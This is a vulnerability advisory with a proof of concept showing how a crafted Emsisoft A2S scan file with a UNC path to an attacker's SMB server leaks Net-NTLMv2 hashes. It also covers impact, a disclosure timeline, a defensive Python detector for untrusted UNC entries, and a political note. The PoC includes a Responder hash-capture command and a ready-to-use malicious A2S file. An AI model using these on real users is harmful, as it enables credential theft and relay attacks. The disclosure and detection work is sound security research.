# Title: Emsisoft Anti-Malware < 2024.12 - ".A2S" Net-NTLMv2 Hash Information Disclosure
# Date: 17.01.2025
# Author: M. Akil Gündoğan
# Vendor Homepage: https://www.emsisoft.com
# Affected Version: < 2024.12
# Tested Version: 2024.9.0.12546
# Tested on: Windows 10 Pro x64

# Vulnerability Description:
--------------------------------------

A vulnerability affecting the scanning module in Emsisoft Anti-Malware < 2024.12 allows an attacker who controls a remote server to obtain Net-NTLMv2 hash information via a specially crafted A2S (Emsisoft Custom Scan) file.

Under normal circumstances, when Windows attempts to connect to a remote SMB server, it automatically sends the current user's Net-NTLMv2 authentication response (the "hash") to that server. For instance, an attacker can exploit this by crafting a malicious LNK file: when the victim right-clicks or left-clicks the LNK file, the NTLMv2 hash of that system is transmitted to the attacker.

What makes this a specific vulnerability in Emsisoft is that the same behaviour can be triggered through an A2S file, a trusted, double-clickable file, without raising any suspicion from the user. The victim clicks the A2S file, Emsisoft launches a normal-looking scanning window, and the attacker obtains the NTLMv2 hash. Extremely simple but effective.

# Technical details and step-by-step Proof of Concept (PoC):
--------------------------------------

1 - As the attacker, create a fake SMB server using the Responder tool on a remote server. After installing Responder, run it with the following command:

    responder -I eth0

2 - Create an A2S file and save it with the following contents:

    [Settings]
    Preset=4
    Folders=;\\192.168.251.131\tmp\;    <------ IP address of the attacker's server
    NTFS=1
    Memory=0
    Traces=0
    DetectPUPs=1
    Archives=1
    MailArchives=0

3 - When the victim opens this specially crafted scan file, the attacker obtains the user's valid NTLMv2 hash.
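As an added defensive example, not part of the advisory or of Emsisoft's own code, the following Python script parses the INI-style [Settings] block of an A2S file and flags every Folders= entry that is a UNC path to a server outside an allowlist; that entry is what makes the scanner authenticate over SMB to an attacker-controlled host, so it is the indicator a mail gateway or endpoint check can look for before a user opens the file. The sample A2S content is constructed to mirror the PoC layout above, and the allowlist host name is hypothetical.

```python
import re
from typing import Dict, List, Tuple

# Constructed sample mirroring the PoC's A2S layout (UNC host taken from the PoC above).
SAMPLE_A2S = r"""[Settings]
Preset=4
Folders=;\\192.168.251.131\tmp\;C:\Users\Public\;
NTFS=1
Memory=0
Traces=0
"""

# Matches "\\server\share..." and captures the server part.
UNC_RE = re.compile(r"^\\\\([^\\]+)\\")


def parse_a2s(text: str) -> Dict[str, str]:
    """Parse the key=value lines of an A2S file into a dict.
    Section headers and blank lines are skipped; keys keep their case."""
    settings: Dict[str, str] = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("[") or "=" not in line:
            continue
        key, _, value = line.partition("=")
        settings[key.strip()] = value.strip()
    return settings


def unc_paths(folders_value: str) -> List[str]:
    """Split the ';'-delimited Folders value and keep only UNC paths."""
    parts = (p.strip() for p in folders_value.split(";"))
    return [p for p in parts if UNC_RE.match(p)]


def find_untrusted_unc(text: str, trusted_hosts=frozenset()) -> List[Tuple[str, str]]:
    """Return (host, path) for every Folders= UNC entry whose server is not on
    the allowlist. Any hit means opening the file makes the scanner authenticate
    to that server over SMB, which is the hash-disclosure path described above."""
    folders = parse_a2s(text).get("Folders", "")
    trusted = {h.lower() for h in trusted_hosts}
    hits = []
    for path in unc_paths(folders):
        host = UNC_RE.match(path).group(1).lower()
        if host not in trusted:
            hits.append((host, path))
    return hits


if __name__ == "__main__":
    # "fileserver01" is a hypothetical internal file server on the allowlist.
    for host, path in find_untrusted_unc(SAMPLE_A2S, trusted_hosts={"fileserver01"}):
        print(f"untrusted SMB target {host}: {path}")
```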
# Impact:
--------------------------------------

If the attacker can relay the captured NTLM authentication or crack the hash, they can achieve privilege escalation depending on the user's role. Additionally, the anti-malware solution itself can be abused as a reliable NTLMv2 hash dump tool.

# Advisories:
--------------------------------------

It is recommended to use alternative security solutions.

# Timeline:
--------------------------------------

- 30.09.2024:
  - The vulnerability was reported.
  - Emsisoft sent a thank-you message and said that they would inform us after the final decision.
- 30.10.2024:
  - Since 30 days had passed, we asked if there was any progress. The response time on the Emsisoft Bug Bounty page was 10 days.
  - We were informed by Emsisoft that a fix was being tested and that, once it was deployed, we would receive an email to test it.
- 06.12.2024:
  - Emsisoft sent us an email saying that they had provided a fix in version 2024.12 and asked us to test it.
  - We tested the relevant version and offered alternative solutions.
  - Emsisoft informed us that our alternative solution suggestions would be forwarded to the development team. They also said that credit would be given for the vulnerability we discovered.
- 14.01.2025:
  - Since 38 days had passed, we asked for an update on our vulnerability report.
  - Emsisoft said that the feature would be deprecated soon. We were informed that in version 2025.1 a notification was added stating that this feature will be removed.
  - In this case, we asked for the latest status of our report. When we reported the vulnerability, we noted that this feature was available.
  - Emsisoft, after review with the development team, responded that their final decision was that this was not a vulnerability.
  - We told them that they had acknowledged the vulnerability from the first submission and reminded them that they had asked us to test the fix.
  - Emsisoft again sent an email saying that they did not consider it a security vulnerability.
- 15.01.2025:
  - We reminded them that they were following a silent-patching approach and informed them that they were conducting an unethical process.
  - Emsisoft informed us that as time progressed after the report was submitted, they realized that it was Windows-related and therefore did not consider it a vulnerability.
- 17.01.2025:
  - Full disclosure.

# References:
--------------------------------------

- PoC Videos: https://youtu.be/LxaYtxdJLM4

# Notes:
--------------------------------------

- Free Palestine, Free Gaza!
- History will judge those who do not oppose this genocide!